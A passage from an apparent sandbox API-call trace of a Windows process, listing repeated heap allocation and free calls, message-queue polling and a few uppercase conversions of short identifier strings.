hHeap=0x2af0000) returned 1 [0101.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0101.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0101.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0101.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.508] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0101.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0101.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0101.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0101.508] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0101.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0101.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0101.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0101.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0101.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0101.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0101.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.510] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0101.510] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0101.510] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0101.510] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0101.510] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0101.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0101.510] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74040 [0101.511] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0101.511] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0101.511] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0101.511] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0101.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0101.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74040 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0101.512] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0101.512] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.512] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0101.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a739c8 [0101.512] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0101.513] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0101.513] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0101.513] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.514] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a739c8 | out: hHeap=0x2af0000) returned 1 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.514] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0101.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 